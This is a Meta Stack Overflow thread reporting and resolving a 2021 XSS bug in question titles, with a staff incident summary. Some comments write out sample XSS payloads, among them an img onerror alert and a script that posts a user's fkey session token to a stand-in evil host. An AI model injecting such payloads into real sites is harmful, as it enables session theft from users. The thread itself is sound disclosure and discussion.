58

This question cannot be rendered. Simple multi-colored textarea based editor

neither on question view, or list view.

enter image description here

The bug is triggered by adding <textarea> or some other tag to the title, as in this revision, or this other question.

17
  • 3
    It's not the pagination, it's that question. It breaks the site. Which is interesting, because the preview looks fine...
    – Ryan M Mod
    Commented Sep 1, 2021 at 10:21
  • 1
    Reproed on chrome
    – U13-Forward
    Commented Sep 1, 2021 at 10:22
  • 1
    and firefox on win10
    – Nick is tired
    Commented Sep 1, 2021 at 10:24
  • The problem was that the title contained <textarea>; I changed it to textarea which seemed to fix it.
    – Bill Tür stands with Ukraine
    Commented Sep 1, 2021 at 10:28
  • 1
    Similar breakage here stackoverflow.com/questions/3558119/… If this is improper HTML escaping it could be pretty serious, no?
    – Jan
    Commented Sep 1, 2021 at 10:36
  • 6
    Looks like a serious XSS vulnerability. Have fun loading a page having <script> document.location.href='';</script> in it.
    – Ivar
    Commented Sep 1, 2021 at 10:37
  • 4
    The search for "html tag" is my favourite: stackoverflow.com/search?q=html+tag
    – Nick is tired
    Commented Sep 1, 2021 at 10:42
  • 10
    People are fast! Someone already tried to take advantage of that...
    – Tomerikoo
    Commented Sep 1, 2021 at 10:52
  • 10
    So, when will Stack Overflow be force-invalidating all user sessions after a blatant XSS vulnerability on the front page of one of the most highly viewed websites about development on the internet? Or will this get brushed under the rug?
    – Qix - MONICA WAS MISTREATED
    Commented Sep 1, 2021 at 11:33
  • 4
    @Qix poor rug, so many things already brushed underneath it. Surely it overflows by now.
    – Shadow Wizard
    Commented Sep 1, 2021 at 11:41
  • @Qix It seems likely that they would be able to check if anyone actually exploited it to do that based on the information in the database. Though grace period edits might be a problem if they're not recorded in the database.
    – Ryan M Mod
    Commented Sep 1, 2021 at 11:46
  • 6
    @Ryan smart hacker or wanna-be-hacker knowing SO enough would indeed use the grace period to hide their activity, making it impossible to monitor. Unless SO also keep log of all the submitted data as it goes through, which I really doubt.
    – Shadow Wizard
    Commented Sep 1, 2021 at 12:01
  • @Tomerikoo What was that question intending to do?
    – Anonymous
    Commented Sep 1, 2021 at 22:05
  • 6
    @Qix-MONICAWASMISTREATED No staff deleted any comments here. Normal comment moderation by the community mods happened, which has never triggered a notification. You can stop the conspiracy mongering.
    – Baum mit Augen Mod
    Commented Sep 2, 2021 at 9:20
  • 1
    @BaummitAugen After the last three years and the deletion of whole conversations during the Monica incident, that trust is entirely lost. It is not a conspiracy, it is fact. Sorry.
    – Qix - MONICA WAS MISTREATED
    Commented Sep 3, 2021 at 9:16

2 Answers 2

Reset to default
74

The vulnerability has been closed (was related to turning off smarty-encoding for titles) and has been fixed (smarty-encoding is once again turned off network-wide).

The vulnerability was on the network for 44 minutes, from 10:02 GMT (the time that smarty-encoding was pushed to prod) until I deactivated it network-wide via site setting at 10:46 GMT.

I can confirm that only two posts were posted/edited during the vulnerability time-window that included <script> tags or other XSS attack vectors, both by the same user, and both were Proof of Concept posts that included <script>alert('hello world');</script> in the title. So there were no actual XSS attacks, no user data was compromised, etc.

Update from Yaakov (2023-12, after no longer with Stack): a more complete account of what happened, along with lessons learned

23
  • 16
    Will there be a full RCA published? Do you know if any of our user/session credentials have been compromised?
    – Gordon
    Commented Sep 1, 2021 at 10:57
  • 7
    It's surprising how a <script> XSS worked like that on a website like SO, I hope we can get more information on the incident, to know we are safe on the website, as the simple use of a tag is the most basic xss vector
    – iunfixit
    Commented Sep 1, 2021 at 11:12
  • 1
    @Gordon depends when they turned off "smarty-encoding for titles", whatever this is. Might be matter of minutes, hours, days, or weeks.
    – Shadow Wizard
    Commented Sep 1, 2021 at 11:42
  • 2
    Agreed. Post mortem would be nice. I suppose impact would be trivial to assess by looking at script tags in titles, if any.
    – Qix - MONICA WAS MISTREATED
    Commented Sep 1, 2021 at 11:46
  • 9
    I'll post more details here when I can. Updated already. Follow this post if you want to know more.
    – Yaakov Ellis
    Commented Sep 1, 2021 at 11:48
  • 7
    @Yaakov but what about grace period edits? Can you track those too? Smart hacker could: 1) start with innocent title, 2) set malicious title in grace period, 3) collect data, and still in grace period, put back the original title. Can you track such edits?
    – Shadow Wizard
    Commented Sep 1, 2021 at 12:24
  • 3
    There are ways to perform XSS without the use of <script>. For example <img src="" onerror="alert('XSS')">.
    – Ivar
    Commented Sep 1, 2021 at 13:04
  • 3
    @Ivar I searched for posts that took advantage of other xss attack vectors as well. Updated the post above to note this.
    – Yaakov Ellis
    Commented Sep 1, 2021 at 13:13
  • 3
    Does it matter which posts were posted or edited during this time period? What about displaying (e.g. in search) any of the existing posts? Or is their content somehow cached? This comment implies that it’s not.
    – Sebastian Simon
    Commented Sep 1, 2021 at 13:57
  • 1
    @Anonymous They would only have to see that it might be a vulnerability. And lots of questions don't get deleted.
    – khelwood
    Commented Sep 1, 2021 at 22:22
  • 2
    @Anonymous How could someone tell that a thing might happen? Optimism and imagination?
    – khelwood
    Commented Sep 1, 2021 at 22:31
  • 2
    @khelwood Good point. But I think a question with the title <script>$.post("https://someevilwebsite.invalid", {"fkey": StackExchange.options.user.fkey});</script> would get deleted pretty quickly (due to it obviously not being a real question)...
    – Anonymous
    Commented Sep 1, 2021 at 23:27
  • 7
    @Anonymous But a title like "What does <script...evil...> do in this code?" could surely look like a real question.
    – khelwood
    Commented Sep 1, 2021 at 23:32
  • 6
    @Qix-MONICAWASMISTREATED If you are talking about stackoverflow.com/questions/69012356 , this was posted after the bug was already fixed
    – samcarter_is_at_topanswers.xyz
    Commented Sep 2, 2021 at 8:35
  • 3
    Are there any plans to implement CSP in order to prevent XSS attacks in the future? There is already a feature request from 2016 on Meta SE, but there was no official answer given by SE. (I know the CSP header is already present, but the current policy isn't very complete/secure, and that's not just my opinion.)
    – Elias Holzmann
    Commented Sep 4, 2021 at 18:02
19

It appears that it included script tags as well. I was able to snap this screenshot at 2021-09-01T10:41:16Z before it was fixed:

hello world JS alert

source code view

1
  • added a screenshot of the source code of the main page when the xss was still active. never mind the selection on the picture. the actual script tag is in line 876
    – Gordon
    Commented Sep 1, 2021 at 11:16

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .